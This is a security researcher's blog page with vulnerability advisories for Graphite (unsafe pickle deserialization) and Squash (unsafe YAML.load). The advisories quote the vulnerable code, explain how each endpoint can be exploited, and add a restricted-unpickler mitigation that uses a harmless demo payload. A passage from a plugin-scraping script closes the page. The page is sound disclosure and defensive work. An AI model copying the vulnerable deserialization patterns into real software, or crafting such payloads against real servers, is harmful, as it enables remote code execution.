<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<base href="https://charlieeriksen.github.io" />
<meta charset="UTF-8" />
<meta name="viewport" content="initial-scale=1.0, width=device-width" />
<title>ceriksen.com</title>
<link rel="stylesheet" type="text/css" media="all" href="https://charlieeriksen.github.io/wp-content/themes/simplex/style.css" />
<!--[if lt IE 9]>
<script src="https://charlieeriksen.github.io/wp-content/themes/simplex/js/html5.js" type="text/javascript"></script>
<script src="https://charlieeriksen.github.io/wp-content/themes/simplex/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel='stylesheet' id='crayon-css' href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css?ver=2.5.0' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-theme-twilight-css' href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/themes/twilight/twilight.css?ver=2.5.0' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-font-monaco-css' href='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css?ver=2.5.0' type='text/css' media='all' />
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var quicktagsL10n = {"closeAllOpenTags":"Close all open tags","closeTags":"close tags","enterURL":"Enter the URL","enterImageURL":"Enter the URL of the image","enterImageDescription":"Enter a description of the image","fullscreen":"fullscreen","toggleFullscreen":"Toggle fullscreen mode","textdirection":"text direction","toggleTextdirection":"Toggle Editor Text Direction"};
/* ]]> */
</script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-includes/js/quicktags.min.js?ver=3.8.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"2.5.0","is_admin":"0","ajaxurl":"http:\/\/ceriksen.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
var CrayonTagEditorSettings = {"home_url":"http:\/\/ceriksen.com","css":"crayon-te","css_selected":"crayon-selected","code_css":"#crayon-code","url_css":"#crayon-url","url_info_css":"#crayon-te-url-info","lang_css":"#crayon-lang","title_css":"#crayon-title","mark_css":"#crayon-mark","range_css":"#crayon-range","inline_css":"crayon-inline","inline_hide_css":"crayon-hide-inline","inline_hide_only_css":"crayon-hide-inline-only","hl_css":"#crayon-highlight","switch_html":"#content-html","switch_tmce":"#content-tmce","tinymce_button":"a.mce_crayon_tinymce","submit_css":"#crayon-te-ok","cancel_css":"#crayon-te-cancel","content_css":"#crayon-te-content","dialog_title_css":"#crayon-te-title","submit_wrapper_css":"#crayon-te-submit-wrapper","data_value":"data-value","attr_sep":":","css_sep":"_","fallback_lang":"default","dialog_title_add":"Add Crayon Code","dialog_title_edit":"Edit Crayon Code","submit_add":"Add","submit_edit":"Save","bar":"#crayon-te-bar","bar_content":"#crayon-te-bar-content","extensions":{"scpt":"applescript","applescript":"applescript","swf":"as","fla":"as","cs":"c#","h":"c++","hh":"c++","hpp":"c++","hxx":"c++","h++":"c++","cc":"c++","cpp":"c++","cxx":"c++","c++":"c++","pas":"delphi","java":"java","class":"java","jar":"java","mv":"miva","mvc":"miva","mvt":"miva","m":"objc","mm":"objc","pl":"perl","py":"python","pyw":"python","pyc":"python","pyo":"python","pyd":"python","rb":"ruby","rbx":"ruby","rhtml":"ruby","vbs":"vb"}};
var CrayonSyntaxSettings = {"version":"2.5.0","is_admin":"0","ajaxurl":"http:\/\/ceriksen.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.te.min.js?ver=2.5.0'></script>
<script type='text/javascript' src='https://charlieeriksen.github.io/wp-content/themes/simplex/lib/js/jquery.fitvids.js?ver=3.8.3'></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-32892239-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script type="text/javascript">
jQuery(document).ready(function(){
jQuery("#page").fitVids();
});
</script> <style type="text/css">
#site-title a,
#site-description {
color: #e6941e !important;
}
</style>
</head>
<body lang="en" class="home blog single-author">
<div id="page" class="hfeed">
<header id="branding" role="banner">
<hgroup>
<h1 id="site-title"><a href="https://charlieeriksen.github.io/" title="ceriksen.com" rel="home">ceriksen.com</a></h1>
<h2 id="site-description"></h2>
<form role="search" method="get" id="searchform" class="searchform" action="https://charlieeriksen.github.io/">
<div>
<label class="screen-reader-text" for="s">Search for:</label>
<input type="text" value="" name="s" id="s" />
<input type="submit" id="searchsubmit" value="Search" />
</div>
</form> </hgroup>
<nav id="access" role="navigation">
<h2 class="assistive-text">Main menu</h2>
<div class="skip-link screen-reader-text"><a href="#content" title="Skip to content">Skip to content</a></div>
<div class="menu"><ul><li class="current_page_item"><a href="https://charlieeriksen.github.io/">Home</a></li></ul></div>
</nav><!-- #access -->
<div class="clear"></div>
</header><!-- #branding -->
<div id="main">
<div id="primary">
<div id="content" role="main">
<nav id="nav-above">
<h2 class="assistive-text">Post navigation</h2>
<div class="nav-previous"><a href="https://charlieeriksen.github.io/page/2/" ><span class="meta-nav">←</span> Older posts</a></div>
</nav><!-- #nav-above -->
<article id="post-292" class="post-292 post type-post status-publish format-standard hentry category-advisories tag-graphite tag-re">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/" title="4:01 pm" rel="bookmark" class="entry-date"><time datetime="2013-08-20T16:01:50+00:00" pubdate>August 20, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/" title="Permalink to Graphite remote code execution vulnerability advisory" rel="bookmark">Graphite remote code execution vulnerability advisory</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Introduction</strong><br />
In <a href="http://graphite.wikidot.com/">graphite-web</a> versions 0.9.5 through 0.9.10, a vulnerability exists as a result of the product's unsafe use of the “pickle” module to deserialize data received over the network.</p>
<p>The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5093 to this issue. This is an entry on the CVE list (<a href="http://cve.mitre.org/" target="_blank">http://cve.mitre.org</a>), which standardizes names for security problems.</p>
<p><strong>Timeline</strong><br />
2013-08-06 – Vendor contacted<br />
2013-08-06 – Vendor confirms issue<br />
2013-08-07 – Sent CVE request, CVE-2013-5093 is assigned<br />
2013-08-20 – Graphite 0.9.11 released<br />
2013-08-20 – Advisory released</p>
<p><strong>Analysis</strong><br />
In graphite-web 0.9.5, a “clustering” feature was introduced to allow for scaling for a graphite setup. This was achieved by passing pickles between servers, and it was introduced in <a href="https://github.com/graphite-project/graphite-web/commit/71d395ee68c156da00504cb41d353980e0afb470">this commit</a>.</p>
<p>The function “renderLocalView”, seen below, takes a request that contains a chart type, and a pickle:</p><!-- Crayon Syntax Highlighter v2.5.0 -->
<div id="crayon-53c98e7805a2f127111174" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Python</span></div></div>
<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
def renderLocalView(request):
  try:
    start = time()
    reqParams = StringIO(request.raw_post_data)
    graphType = reqParams.readline().strip()
    optionsPickle = reqParams.read()
    reqParams.close()
    graphClass = GraphTypes[graphType]
    options = pickle.loads(optionsPickle)
    image = doImageRender(graphClass, options)
    log.rendering("Delegated rendering request took %.6f seconds" % (time() - start))
    return buildResponse(image)
  except:
    log.exception("Exception in web.render.views.rawrender")
    return HttpResponseServerError()</textarea></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-2">2</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-4">4</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-6">6</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-8">8</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-10">10</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-12">12</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7805a2f127111174-14">14</div><div class="crayon-num" data-line="crayon-53c98e7805a2f127111174-15">15</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7805a2f127111174-1"><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-e">renderLocalView</span><span class="crayon-sy">(</span><span class="crayon-i">request</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-2"><span class="crayon-h"> </span><span class="crayon-st">try</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-3"><span class="crayon-h"> </span><span class="crayon-v">start</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">time</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-4"><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">StringIO</span><span class="crayon-sy">(</span><span class="crayon-v">request</span><span class="crayon-sy">.</span><span class="crayon-i">raw_post_data</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-5"><span class="crayon-h"> </span><span class="crayon-v">graphType</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-k ">readline</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">strip</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" 
id="crayon-53c98e7805a2f127111174-6"><span class="crayon-h"> </span><span class="crayon-v">optionsPickle</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-7"><span class="crayon-h"> </span><span class="crayon-v">reqParams</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-8"><span class="crayon-h"> </span><span class="crayon-v">graphClass</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-v">GraphTypes</span><span class="crayon-sy">[</span><span class="crayon-i">graphType</span><span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-9"><span class="crayon-h"> </span><span class="crayon-v">options</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">pickle</span><span class="crayon-sy">.</span><span class="crayon-e">loads</span><span class="crayon-sy">(</span><span class="crayon-i">optionsPickle</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-10"><span class="crayon-h"> </span><span class="crayon-v">image</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-e">doImageRender</span><span class="crayon-sy">(</span><span class="crayon-i">graphClass</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">options</span><span class="crayon-sy">)</span></div><div 
class="crayon-line" id="crayon-53c98e7805a2f127111174-11"><span class="crayon-h"> </span><span class="crayon-v">log</span><span class="crayon-sy">.</span><span class="crayon-e">rendering</span><span class="crayon-sy">(</span><span class="crayon-s">"Delegated rendering request took %.6f seconds"</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-k ">time</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-h"> </span><span class="crayon-i">start</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-12"><span class="crayon-h"> </span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">buildResponse</span><span class="crayon-sy">(</span><span class="crayon-i">image</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-13"><span class="crayon-h"> </span><span class="crayon-st">except</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7805a2f127111174-14"><span class="crayon-h"> </span><span class="crayon-v">log</span><span class="crayon-sy">.</span><span class="crayon-k ">exception</span><span class="crayon-sy">(</span><span class="crayon-s">"Exception in web.render.views.rawrender"</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7805a2f127111174-15"><span class="crayon-h"> </span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">HttpResponseServerError</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td>
</tr>
</table>
</div>
</div>
<!-- [Format Time: 0.0064 seconds] -->
<p>However, because no safety measures were implemented to restrict the types of objects that can be unpickled, any client able to reach this view can have arbitrary code executed on the server, <a href="http://blog.nelhage.com/2011/03/exploiting-pickle/">as has been documented by Nelson Elhage</a>.</p>
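<p>As an added illustration, not part of this advisory and not graphite-web's own code, the following Python shows the defensive counterpart to the <code>pickle.loads(optionsPickle)</code> call above: a restricted unpickler whose <code>find_class</code> refuses every global that is not on an allowlist, followed by a type check on the result. The names <code>RestrictedUnpickler</code>, <code>safe_loads</code> and the sample payloads are assumptions made for this example, as is the assumption that a legitimate options object is a plain dict of primitives.</p>

```python
import io
import os
import pickle

# Allowlist of globals a chart-options pickle may reference. Assumption (not
# stated in the advisory): Graphite's "options" object is a plain dict of
# strings, numbers, booleans and lists, so nothing beyond a few harmless
# builtins is ever needed. Everything else is refused before it can be called.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "range"),
    ("builtins", "slice"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted (module, name) pairs.

    The unpickler calls find_class() for every GLOBAL / STACK_GLOBAL opcode and
    may then call the resulting object via REDUCE; refusing unknown names here
    is what stops deserialization from turning into code execution.
    """

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "refusing to resolve global %s.%s" % (module, name))


def safe_loads(data: bytes) -> dict:
    """Hardened stand-in for `pickle.loads(optionsPickle)`: restricted
    globals plus a check that the result has the expected shape."""
    options = RestrictedUnpickler(io.BytesIO(data)).load()
    if not isinstance(options, dict):
        raise pickle.UnpicklingError(
            "options must be a dict, got %s" % type(options).__name__)
    return options


def is_accepted(data: bytes) -> bool:
    """True if safe_loads() accepts the payload, False if it refuses it."""
    try:
        safe_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


# --- constructed sample payloads (not taken from the advisory) --------------

def make_benign_options() -> bytes:
    """What a legitimate clustering peer would send: a plain options dict."""
    return pickle.dumps({"width": 800, "height": 300,
                         "title": "cpu.load", "hideLegend": False})


def make_non_dict_payload() -> bytes:
    """Well-formed but not the expected shape; the type check rejects it."""
    return pickle.dumps(["not", "an", "options", "dict"])


class _CallableReference:
    """Stand-in for an object that makes the unpickler call a global.

    os.getcwd is used because it is harmless; the mechanism (a __reduce__ that
    names a callable and its arguments) is the one the advisory refers to.
    """

    def __reduce__(self):
        return (os.getcwd, ())


def make_global_reference_payload() -> bytes:
    return pickle.dumps(_CallableReference())


def unrestricted_loads_runs_callable(data: bytes) -> bool:
    """Shows what the original code does: plain pickle.loads executes the
    referenced callable, so the result is a directory name, not a dict."""
    return pickle.loads(data) == os.getcwd()


if __name__ == "__main__":
    print("benign options accepted:", is_accepted(make_benign_options()))
    print("non-dict payload accepted:", is_accepted(make_non_dict_payload()))
    print("global reference accepted:",
          is_accepted(make_global_reference_payload()))
    print("unrestricted loads ran the callable:",
          unrestricted_loads_runs_callable(make_global_reference_payload()))
```

<p>The allowlist approach is one mitigation pattern for untrusted pickles; it is not a description of the change shipped in Graphite 0.9.11. Note that the restricted unpickler rejects the payload at the point where the global is resolved, before anything is called, whereas plain <code>pickle.loads</code> has already run the callable by the time it returns.</p>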
<p><strong>Proof of concept</strong><br />
The proof of concept can be found as a part of the Metasploit Framework <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/graphite_pickle_exec.rb">graphite_pickle_exec module</a>.</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/graphite/" rel="tag">Graphite</a>, <a href="https://charlieeriksen.github.io/tag/re/" rel="tag">re</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/#respond" title="Comment on Graphite remote code execution vulnerability advisory">Leave a comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-292 -->
<article id="post-282" class="post-282 post type-post status-publish format-standard hentry category-advisories tag-squash">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/" title="6:40 pm" rel="bookmark" class="entry-date"><time datetime="2013-08-06T18:40:19+00:00" pubdate>August 6, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/" title="Permalink to Squash remote code execution vulnerability advisory" rel="bookmark">Squash remote code execution vulnerability advisory</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Introduction</strong></p>
<p>A security flaw in Square’s open source project “Squash” was fixed silently by the developers on <a href="https://github.com/SquareSquash/web/commit/6d667c19e96e4f23dccbfbe24afeebd18e98e1c5">June 24th</a>, which I had happened to stumble upon but had not disclosed at the time. Since I couldn’t find an advisory for it, here it is. The Metasploit module can be found below.</p>
<p>The Common Vulnerabilities and Exposures (CVE) project has assigned the name <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5036">CVE-2013-5036</a> to this issue. This is an entry on the CVE list (<a href="http://cve.mitre.org">http://cve.mitre.org</a>), which standardizes names for security problems.</p>
<p><strong>Analysis</strong></p>
<p>The Squash API is intended for clients to submit details about exceptions and bugs. As a part of that, a YAML dump can be submitted. However, before the <a href="https://github.com/SquareSquash/web/commit/6d667c19e96e4f23dccbfbe24afeebd18e98e1c5">patch</a>, one could submit a YAML document to the deobfuscation and sourcemap actions in app/controllers/api/v1_controller.rb without supplying an API key.</p><!-- Crayon Syntax Highlighter v2.5.0 -->
<div id="crayon-53c98e7808546719317820" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Ruby</span></div></div>
<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
def deobfuscation
  require_params :api_key, :environment, :build, :namespace

  map = YAML.load(Zlib::Inflate.inflate(Base64.decode64(params['namespace'])))
  return head(:unprocessable_entity) unless map.kind_of?(Squash::Java::Namespace)</textarea></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7808546719317820-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808546719317820-2">2</div><div class="crayon-num" data-line="crayon-53c98e7808546719317820-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7808546719317820-4">4</div><div class="crayon-num" data-line="crayon-53c98e7808546719317820-5">5</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7808546719317820-1"><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-i">deobfuscation</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808546719317820-2"><span class="crayon-h"> </span><span class="crayon-i">require_params</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">api_key</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">environment</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">build</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-o">:</span><span class="crayon-i">namespace</span></div><div class="crayon-line" id="crayon-53c98e7808546719317820-3"> </div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7808546719317820-4"><span class="crayon-h"> </span><span class="crayon-v">map</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">YAML</span><span class="crayon-sy">.</span><span class="crayon-e">load</span><span class="crayon-sy">(</span><span class="crayon-i">Zlib</span><span class="crayon-o">::</span><span class="crayon-v">Inflate</span><span class="crayon-sy">.</span><span class="crayon-e">inflate</span><span class="crayon-sy">(</span><span class="crayon-v">Base64</span><span class="crayon-sy">.</span><span class="crayon-e">decode64</span><span class="crayon-sy">(</span><span class="crayon-v">params</span><span class="crayon-sy">[</span><span class="crayon-s">'namespace'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line" 
id="crayon-53c98e7808546719317820-5"><span class="crayon-h"> </span><span class="crayon-st">return</span><span class="crayon-h"> </span><span class="crayon-e">head</span><span class="crayon-sy">(</span><span class="crayon-o">:</span><span class="crayon-i">unprocessable_entity</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-st">unless</span><span class="crayon-h"> </span><span class="crayon-v">map</span><span class="crayon-sy">.</span><span class="crayon-i">kind_of</span><span class="crayon-sy">?</span><span class="crayon-sy">(</span><span class="crayon-i">Squash</span><span class="crayon-o">::</span><span class="crayon-i">Java</span><span class="crayon-o">::</span><span class="crayon-i">Namespace</span><span class="crayon-sy">)</span></div></div></td>
</tr>
</table>
</div>
</div>
<!-- [Format Time: 0.0031 seconds] -->
<p>Note that the document is parsed with <code>YAML.load</code> rather than a safe load, so the deserializer will instantiate whatever classes the submitted YAML names; this is what makes the endpoint exploitable by sending a crafted YAML payload. The <code>kind_of?</code> check on the next line runs only after the object has already been constructed.</p>
<p><strong>Proof of concept</strong></p>
<p><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/squash_yaml_exec.rb">Metasploit module</a></p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/squash/" rel="tag">Squash</a> </span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-282 -->
<article id="post-276" class="post-276 post type-post status-publish format-standard hentry category-security tag-wordpress tag-wordpress-plugins">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/" title="9:33 pm" rel="bookmark" class="entry-date"><time datetime="2013-06-18T21:33:10+00:00" pubdate>June 18, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/" title="Permalink to BSides Rhode Island presentation and slides" rel="bookmark">BSides Rhode Island presentation and slides</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p>Over this weekend I went to <a href="http://www.securitybsides.com/w/page/61966594/BSidesRI">BSides Rhode Island</a> to give a presentation about the research I’ve been doing on WordPress plugins. The video can be found <a href="http://www.irongeek.com/i.php?page=videos/bsidesri2013/0-0-large-scale-application-security-charlie-eriksen">here</a>, thanks to Irongeek.</p>
<p>I promised at BSides to release my slides and some of my code. So without further ado, here’s the presentation file: <a href="https://charlieeriksen.github.io/wp-content/uploads/2013/06/Large-scale-application-security.pptx">Large-scale application security</a></p>
<p>And here is the code:</p>
<pre><code class="language-python"># Python 2 script (urllib.urlopen, xrange, print statement): downloads the most
# popular WordPress.org plugins above a download-count threshold for offline review.
from bs4 import *
import urllib
import os
from urlparse import urlsplit
import argparse

def main(args):
    # Create the output folder if it does not exist yet
    if not os.path.exists(args.output):
        os.makedirs(args.output)

    for pageNumber in xrange(args.pages):
        # Fetch one page of the "popular" plugin listing
        page = BeautifulSoup(urllib.urlopen("http://wordpress.org/extend/plugins/browse/popular/page/" \
                                            + str(pageNumber)).read())
        for x in page.findAll('div', {'class': 'plugin-block'}):
            # The third li element of the plugin block holds the download count; keep only its digits
            if int(filter(lambda y: y.isdigit(), str(x.ul.findAll('li')[2]))) > args.downloads:
                # Follow the plugin page and take the zip link from its download button
                downloadLink = BeautifulSoup(urllib.urlopen(x.h3.a['href']).read()) \
